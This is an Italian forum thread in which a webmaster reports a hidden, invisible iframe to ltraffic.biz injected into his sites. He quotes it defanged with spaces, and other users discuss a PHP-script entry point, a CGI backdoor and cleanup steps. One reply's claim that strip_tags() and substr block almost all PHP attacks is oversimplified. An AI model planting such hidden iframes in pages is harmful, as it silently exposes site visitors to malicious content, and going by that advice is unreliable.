FORUM di alVerde.net
Ricerca personalizzata

Torna indietro   FORUM di alVerde.net > GUADAGNARE CON INTERNET > DIALER
Registrazione Regolamento FAQ Cerca I messaggi di oggi Segna forums come letti

Ultimi post pubblicati nel blog
Network di affiliazione e ritardi nei pagamenti
Esempi di paid to write e di article marketing
E' lecito guadagnare con AdSense nei siti di video streaming?
Come ottimizzare AdSense usando Google Analytics?
Nuove affiliazioni
Live Player
Nokia.it
Music-Box.mobi
CreaSitoWeb.com
Rispondi
 
LinkBack Strumenti discussione Modalità visualizzazione
  #1  
Vecchio 26-05-2007, 12.46.49
Senior Member
 
Data registrazione: 22-02-2004
Messaggi: 199
iTrader: 0 / 0%
Goldrakkio
Predefinito LTraffic.biz

Ieri su tutti i miei siti è comparso questo codice.

<i f r a m e s r c ="h t t p :/ / ltraffic.biz/resource.php?id=4127&user=f1rebl00d" width=1 height=1 style="display:none" > < / i f r a m e >

(ho messo io gli spazi nel codice per non fare partire il dialer su alverde...)

Penso che il webmaster con id4127 user firebl00d abbia bucato il server dove sono i miei siti ed aggiunto il suo codice

QUalcuno conosce questa società ltraffic.biz?
Come mi devo comportare, segnalo tutto alla società e lo bannano?


http://www.urlare.it
__________________

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
google_ad_section_end -->
Rispondi citando
Oggi
Annunci Sponsorizzati
 
  #2  
Vecchio 26-05-2007, 19.36.34
Senior Member
 
Data registrazione: 04-05-2005
Messaggi: 923
iTrader: 0 / 0%
paolinox is on a distinguished road
Predefinito

russi....mi sa che sono stati proprio loro, visto che la società si occupa di scambio visite e non di dialer.....

ti avranno bucato loro....

p.s. mica hai i server in Estonia?


Giochi online in Flash & Shockwave
Rispondi citando
  #3  
Vecchio 28-05-2007, 13.40.57
Moderatore in pensione
 
Data registrazione: 22-12-2004
Messaggi: 250
iTrader: 0 / 0%
Act4rus is an unknown quantity at this point
Predefinito

è possibile che tu abbia dei codici javascript per invocare lo scambio banner?
se è così è molto propabile che non ti hanno bucato il server ma hanno semplicemente cambiato invocazione di pagina e adesso ti ritrovi dei dialer.
cmq se vuoi fare un test (se il server è tuo) entra in remoto vai nella cartella dove si trova una di queste pagine modificate, fai tasto dx --> proprietà e vedi la data dell'ultima modifica, se riscontri che in quella data tu non hai apportato modifiche allora è propabile che ti abbiano bucato.
Rispondi citando
  #4  
Vecchio 28-05-2007, 16.34.35
Senior Member
 
Data registrazione: 22-02-2004
Messaggi: 199
iTrader: 0 / 0%
Goldrakkio
Predefinito

Non ho il server in Estonia
cmq ho parlato con il provider e mi ha detto che non hanno bucato il server ma probabilmente sono riusciti ad entrare solo sui miei siti...
Che faccio li segnalo alla società?



http://www.urlare.it
Rispondi citando
  #5  
Vecchio 28-05-2007, 18.31.05
Senior Member
 
Data registrazione: 17-10-2006
Messaggi: 115
iTrader: 0 / 0%
StellaMania
Predefinito

Segnalalo alla società perchè sono gli stessi che hanno cercato di entrare nei nostri servers di advmania qualche giorno fa!


Supporto online: www.advmania.com Pubblicità sul tuo sito
Pay per Click
Pay per Click-in (blindlink)
Pay per Redirect
Pay per Slide
Rispondi citando
  #6  
Vecchio 28-05-2007, 19.31.39
Moderatore in pensione
 
Data registrazione: 22-12-2004
Messaggi: 250
iTrader: 0 / 0%
Act4rus is an unknown quantity at this point
Predefinito

beh mi auguro che la società sia estranea a queste cose, anche se ne dubito fortemente.
io direi di togliere gli script di scambio banner che hai
Rispondi citando
  #7  
Vecchio 28-05-2007, 21.57.13
Senior Member
 
Data registrazione: 16-04-2007
Messaggi: 463
iTrader: 0 / 0%
oziofester
Predefinito

Citazione:
quote:Originally posted by StellaMania

Segnalalo alla società perchè sono gli stessi che hanno cercato di entrare nei nostri servers di advmania qualche giorno fa!
Come? Da che parte? Applicazioni web open source, ssh, bind, apache?
Grazie ciao.


Ozio Fester
Rispondi citando
  #8  
Vecchio 29-05-2007, 11.39.53
Senior Member
 
Data registrazione: 17-10-2006
Messaggi: 115
iTrader: 0 / 0%
StellaMania
Predefinito

Entrano tramite php script, ti inseriscono un iframe con l'url (ltraffic.biz/resource.php?id=4127&user=f1rebl00d) e ti lasciano sul server un cgi per dargli modo di accedere allo script quando vogliono. Ti consiglio di controllare tutti i files che hai nel server, di installare software anti intrusione e di bloccare l'accesso ftp.
Non credo che ltraffic.biz sia consapevole quindi potresti provare a contattarli sul loro icq: 266371367 per far bannare id4127 user firebl00d, cmq appena mi aggiungono su icq ci parlo anche io..
Rispondi citando
  #9  
Vecchio 29-05-2007, 12.05.04
L'avatar di malamessomal
Senior Member
 
Data registrazione: 20-03-2004
Messaggi: 602
iTrader: 0 / 0%
malamessomal
Predefinito

Pulite gli input provenienti dall'esterno ?
nel 99% dei casi basta uno strip_tags() e un substr per bloccare un attacco ad uno script php

ps. i cgi spesso non vengono usati, se è il vostro caso disabilitateli


Cazzate Barzellette Satira e Umorismo - join the fun
Rispondi citando
  #10  
Vecchio 29-05-2007, 14.25.26
Senior Member
 
Data registrazione: 22-02-2004
Messaggi: 199
iTrader: 0 / 0%
Goldrakkio
Predefinito

Premesso che non capisco niente di php cgi ecc ecc.,
il server sul quale sono i miei siti non è apache ma un IIS con asp e non php
inoltre nelle pagine non ci sono scambi banner in php
cmq il problema SEMBRA risolto, non mi resta che segnalare il fatto alla società ltraffic.biz, anche se non so con quali effetti...
saluti e grazie.
Max


http://www.urlare.it
Rispondi citando
Rispondi
Tags:



Ottieni illimitati aggiornamenti sul guadagno online (GRATIS)*
* Ricevi gli articoli e le news di alVerde nella tua casella email. (La tua email è al sicuro --> Eventualmente puoi cancellarti con un click.)


Strumenti discussione
Modalità visualizzazione

Regole di scrittura
Tu non puoi inserire nuovi messaggi
Tu non puoi rispondere ai messaggi
Tu non puoi inviare files
Tu non puoi modificare i tuoi messaggi

Il codice vB è Attivato
Le faccine sono Attivato
Il codice [IMG] è Attivato
Il codice HTML è Disattivato
Trackbacks are Attivato
Pingbacks are Attivato
Refbacks are Attivato

Discussioni simili
Discussione Autore discussione Forum Risposte Ultimo messaggio
[Vendo] Lusso.biz, Gallardo.biz, Murcielago.biz void COMPRAVENDITA SITI E DOMINI 0 01-10-2008 13.40.48
[vendo] domini - Arafat.biz, Fruity.biz, Hardkore.biz, Murderer.biz, Penal.biz Shakur COMPRAVENDITA SITI E DOMINI 0 19-04-2008 00.22.52
[Vendo] GeoDomini - Jedda.net, Roumania.biz, Damasco.biz, Edinburg.biz, WakeIsland.tv Shakur COMPRAVENDITA SITI E DOMINI 0 17-04-2008 16.13.31
Valutate waphome.it...biz.biz..sfondigratis.net.. KikoWeb COMPRAVENDITA SITI E DOMINI 12 19-09-2005 03.38.17


© 2001-2008 Advert Planet di Paolo Moro - Partita IVA 02280390309 - Acquisti - PR & Marketing Network - Hosting: ASPCodeHOST
Powered by vBulletin versione 3.6.8
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.1.0
Traduzione italiana : www.vbulletin.it
Inactive Reminders By Icora Web Design